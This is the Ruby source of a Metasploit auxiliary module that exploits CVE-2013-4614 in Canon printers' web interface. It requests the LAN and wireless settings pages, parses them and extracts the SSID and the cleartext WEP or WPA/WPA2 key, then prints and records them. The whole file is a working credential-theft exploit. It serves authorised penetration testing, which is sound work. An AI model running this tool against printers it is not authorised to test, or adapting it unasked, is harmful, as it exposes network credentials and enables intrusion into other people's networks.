rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'nokogiri'
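# Auxiliary scanner that reads the LAN and wireless configuration pages served
# by the embedded web interface of Canon printers (CVE-2013-4614) and records
# what those pages disclose.
#
# Only two GET requests are issued per host; nothing is written to the device.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Configuration pages requested from the printer's web interface.
  LAN_SETTINGS_URI = '/English/pages_MacUS/lan_set_content.html'.freeze
  WLS_SETTINGS_URI = '/English/pages_MacUS/wls_set_content.html'.freeze

  # Registers the module metadata (name, description, references, notes).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Canon Printer Wireless Configuration Disclosure',
        'Description' => %q{
          This module enumerates wireless credentials from Canon printers with a web interface.
          It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
          MX890, MX920.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
        'References' => [
          [ 'CVE', '2013-4614' ],
          [ 'OSVDB', '94417' ],
          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
        ],
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Reads the LAN settings page and extracts the selected LAN mode and, for
  # wireless mode, the configured SSID.
  #
  # @return [Array(String, String), nil] [lan_setting, ssid], or nil when the
  #   page could not be fetched or exactly one checked LAN_OPT1 input was not found
  def get_network_settings
    html = fetch_settings_page(LAN_SETTINGS_URI)
    return unless html

    checked_lan_setting = html.xpath('//input[@name="LAN_OPT1" and @checked]')
    unless checked_lan_setting.count == 1
      print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
      return
    end

    lan_setting = ''
    ssid = ''
    case checked_lan_setting[0]['value']
    when '0'
      lan_setting = 'Do not use LAN'
    when '1'
      lan_setting = 'Use wired LAN'
    when '2'
      lan_setting = 'Use wireless LAN'
      ssid_input = html.xpath('//input[@name="LAN_TXT1"]')
      ssid = ssid_input[0]['value'] if ssid_input.count == 1
    end

    [lan_setting, ssid]
  end

  # Reads the wireless settings page and extracts the selected encryption
  # type together with the key material shown on that page.
  #
  # @return [Array(String, String), nil] [encryption_setting, encryption_key],
  #   or nil when the page could not be fetched or no checked WLS_OPT1 input
  #   is present
  def get_wireless_key
    html = fetch_settings_page(WLS_SETTINGS_URI)
    return unless html

    # Previously the first node was indexed without checking that the query
    # matched anything, which raised NoMethodError on an unexpected page.
    checked_encryption_setting = html.xpath('//input[@name="WLS_OPT1" and @checked]').first
    unless checked_encryption_setting
      print_error("#{rhost}:#{rport} Could not determine wireless encryption settings.")
      return
    end

    encryption_setting = ''
    encryption_key = ''
    case checked_encryption_setting['value']
    when '0'
      encryption_setting = 'None'
    when '1'
      encryption_setting = 'WEP'
      wep_key_inputs = html.xpath('//input[starts-with(@name, "WLS_TXT1") and not(@value="")]')
      encryption_key = wep_key_inputs.map { |input| input['value'] }.join(', ')
    when '2'
      encryption_setting = 'WPA'
      encryption_key = input_value(html, 'WLS_TXT2')
    when '3'
      encryption_setting = 'WPA2'
      encryption_key = input_value(html, 'WLS_TXT3')
    end

    [encryption_setting, encryption_key]
  end

  # Scanner entry point, called once per target host.
  #
  # @param ip [String] address of the host currently being scanned
  # @return [void]
  def run_host(ip)
    ns = get_network_settings
    return if ns.nil?

    data = {
      :rhost => rhost,
      :rport => rport,
      :option => ns[0]
    }
    summary = ["#{rhost}:#{rport} Option: #{ns[0]}"]

    if ns[0] == 'Use wireless LAN'
      data[:ssid] = ns[1]
      summary << "SSID: #{ns[1]}"

      # get_wireless_key returns nil when the wireless page is unavailable;
      # keep the SSID finding instead of failing on nil[0].
      wireless_key = get_wireless_key
      if wireless_key
        data.merge!(
          {
            :encryption_type => wireless_key[0],
            :key => wireless_key[1]
          }
        )
        summary << "Encryption Type: #{wireless_key[0]}"
        summary << "Key: #{wireless_key[1]}"
      end
    end

    # NOTE: data and the summary line can contain the cleartext wireless key.
    # The note is handed to report_note and the summary is printed, so
    # database exports and console logs should be handled as sensitive.
    report_note({
      :data => data,
      :type => 'canon.wireless',
      :host => ip,
      :port => rport
    })

    # The original referenced an undefined local (good_string) here and
    # raised NameError after the note had been stored.
    print_good(summary.join("\t"))
  end

  private

  # Requests +uri+ with GET and returns the parsed HTML document.
  #
  # @param uri [String] path of the settings page to request
  # @return [Nokogiri::HTML::Document, nil] nil when the request raised, no
  #   response was returned, or the status was not 200 (401 and 404 are reported)
  def fetch_settings_page(uri)
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => uri
      })
    rescue StandardError
      # rhost is used here; one of the original handlers interpolated an
      # undefined `ip` local and would itself have raised NameError.
      print_error("#{rhost}:#{rport} Could not connect.")
      return
    end

    return unless res

    case res.code
    when 200
      Nokogiri::HTML(res.body)
    when 401
      print_error("#{rhost}:#{rport} Authentication failed")
      nil
    when 404
      print_error("#{rhost}:#{rport} File not found")
      nil
    end
  end

  # Returns the value attribute of the first input named +name+, or an empty
  # string when the input or its value attribute is missing.
  #
  # @param html [Nokogiri::HTML::Document] parsed settings page
  # @param name [String] value of the input's name attribute (module constant,
  #   never taken from the response)
  # @return [String]
  def input_value(html, name)
    input = html.at_xpath("//input[@name=\"#{name}\"]")
    input ? input['value'].to_s : ''
  end
end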